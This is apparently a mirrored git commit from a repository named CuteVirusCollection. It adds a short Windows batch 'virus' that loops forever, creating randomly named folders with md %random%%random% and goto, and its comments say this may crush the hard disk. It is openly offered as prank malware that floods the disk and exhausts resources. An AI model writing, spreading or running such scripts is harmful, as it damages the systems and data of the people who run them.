mirror of
https://github.com/MinhasKamal/CuteVirusCollection.git
synced 2026-06-12 19:11:16 -07:00
Creates a lot of folders on the disk.
This commit is contained in:
@@ -0,0 +1,6 @@
|
||||
:: Source- http://www.explorehacking.com/2011/01/batch-files-art-of-creating-viruses.html
|
||||
:: Creates a lot of folders on the disk. Running it for long time may crush hard-disk.
|
||||
|
||||
:x
|
||||
md %random%%random%
|
||||
goto x
|
||||
Reference in New Issue
Block a user